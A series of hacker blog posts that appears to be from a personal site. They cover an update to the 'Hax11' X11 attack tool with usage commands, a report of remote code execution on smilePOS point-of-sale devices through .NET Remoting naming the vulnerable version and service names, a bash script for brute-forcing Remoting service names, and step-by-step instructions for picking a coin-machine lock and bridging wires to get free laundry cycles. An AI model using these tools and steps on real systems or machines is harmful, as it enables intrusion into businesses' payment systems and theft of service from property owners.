Update to Hax11 allows connect to more display ports for larger attack surface

 I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 "port 6000", but now you can connect to any a system has available. 

Example:

If you want to connect to display 1 "port 6001" use this command:

python hax11.py ip.addr.here 1

If you want to connect to display 0 use the old command style:

python hax11.py ip.addr.here

You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles or more your attack surface. So while the change is small, the impact is big. 

Get it HERE

Enjoy! 

smilePOS RCE via MS .NET Remoting

While searching the internets for MS .NET Remoting deployments to test my service name brute force script, I stumbled on a gem. 

While testing I noticed a lot of systems with port 9099 was vulnerable to MS .NET Remoting abuse that also had a web port with a smilePOS login page served up. First I ever heard of this, so a quick Google search suggested these were a POS device of sorts, this made sense since all the ones I had found had all the same ports and services running. 

So with a bit more looking around I could confirm RCE on all found smilePOS devices, 2021.1.2103.0 is the only version tested. The service names my tool were able to identify are r1 and r2. If anyone has something to add please let me know, otherwise enjoy.

Automate brute forcing service names in vulnerable MS .NET Remoting deployments.

As anyone who is familiar with exploiting a MS .NET Remoting service, they know finding the correct service name can be a pain without the source code. If you don't know what it is Google is a good place to start. The tool ExploitRemotingService makes the job a snap, but it still has the limitation of needing the right service name, and brute forcing by hand is just crazy. 

I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched github for MS .NET Remoting apps and added the names they were using as well. Then coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm with a few bugs. 

Still I thought it could be a nice tool to have in your bag of holding so I am made it available on github. I hope someone gets use of it. 

Usage: ./bfNET ip.addr port

Get it here

Getting free cycles out of coin operated laundry machines

 A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playin with tech and machines so she asked if we could figure out how to get the coins out. I explained that would be a bad idea as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubal lock as seen below:

So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:

As you can see it's just a few wires, I figured this was our access point to free cycles. You can see the white bracket to connect the coin functions to the machine as seen below:

So I disconnected them, and since there's only two wires, I figured a simple bridge of the two would likely give me the results I was hoping for. I then grabbed a paperclip to bridge them and just like that we had free cycles! Here is what it looked like:

Now you just reconnect the wires, put the door back on, lock, and push start. I gave the paperclip, and tubular pick to my buddy so she can have free cycles at any place with greedy landlords. It was a fun little project and I was happy to help out.